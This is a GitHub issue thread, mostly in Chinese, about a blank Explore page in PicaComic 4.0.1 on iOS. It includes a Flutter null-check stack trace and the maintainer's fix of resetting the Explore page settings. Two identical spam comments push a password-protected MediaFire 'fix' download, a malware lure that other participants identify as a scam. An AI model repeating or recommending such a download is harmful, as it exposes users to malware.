### ISSUE TITLE
[Bug]: iOS 4.0.1探索页面空白，日志中有报错

### ISSUE THREAD

**Issue by Fatfish588** [wgh136/PicaComic#635]
### 描述/Description

iOS 4.0.1探索页面空白，日志中有报错

### Version

4.0.1

### 使用的操作系统/Operating system

iOS

### 日志/logs

error Unhandled Exception 2024-08-27 12:07:46.278744 
Null check operator used on a null value
#0      _RenderTabFlex.performLayout (package:pica_comic/components/appbar.dart:542)
#1      RenderObject.layout (package:flutter/src/rendering/object.dart:2608)
#2      RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111)
#3      RenderCustomPaint.performLayout (package:flutter/src/rendering/custom_paint.dart:569)
#4      RenderObject.layout (package:flutter/src/rendering/object.dart:2608)
#5      RenderPadding.performLayout (package:flutter/src/rendering/shifted_box.dart:234)
#6      RenderObject.layout (package:flutter/src/rendering/object.dart:2608)
#7      RenderPadding.performLayout (package:flutter/src/rendering/shifted_box.dart:234)
#8      RenderObject.layout (package:flutter/src/rendering/object.dart:2608)
#9      _RenderSingleChildViewport.performLayout (package:flutter/src/widgets/single_child_scroll_view.dart:483)
#10     RenderObject.layout (package:flutter/src/rendering/object.dart:2608)
#11     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111)
#12     RenderObject.layout (package:flutter/src/rendering/object.dart:2608)
#13     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111)
#14     RenderObject.layout (package:flutter/src/rendering/object.dart:2608)
#15     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111)
#16     RenderObject.layout (package:flutter/src/rendering/object.dart:2608)
#17     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111)
#18     RenderObject.layout (package:flutter/src/rendering/object.dart:2608)
#19     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111)
#20     RenderObject.layout (package:flutter/src/rendering/object.dart:2608)
#21     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111)
#22     RenderObject.layout (package:flutter/src/rendering/object.dart:2608)
#23     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111)
#24     RenderObject.layout (package:flutter/src/rendering/object.dart:2608)
#25     RenderPadding.performLayout (package:flutter/src/rendering/shifted_box.dart:234)
#26     RenderObject.layout (package:flutter/src/rendering/object.dart:2608)
#27     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111)
#28     RenderObject.layout (package:flutter/src/rendering/object.dart:2608)
#29     RenderConstrainedBox.performLayout (package:flutter/src/rendering/proxy_box.dart:291)
#30     RenderObject.layout (package:flutter/src/rendering/object.dart:2608)
#31     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111)
#32     RenderObject.layout (package:flutter/src/rendering/object.dart:2608)
#33     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111)
#34     _RenderCustomClip.performLayout (package:fl...

### 截图或视频/Screenshot or video

![81b6b5b2056aaa31da1b7e8158d50c38](https://github.com/user-attachments/assets/75c1a859-607b-43cc-9d3a-5ae871ae64e5)

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Fatfish588** [comment]
楼上这是啥新骗术啊，github也能被盗号了吗

**Comment by wgh136** [comment]
> 楼上这是啥新骗术啊，github也能被盗号了吗

是使用了几年的老账号, 没办法进行限制, 只能手动把他们拉黑

**Comment by wgh136** [comment]
关于问题, 这个是探索页面进行了改动, 忘了修改探索页面的默认设置导致的
去设置-浏览-探索页面把所有的删掉重新添加, 下个版本会修复此问题

**Comment by Fatfish588** [comment]
好的，非常感谢
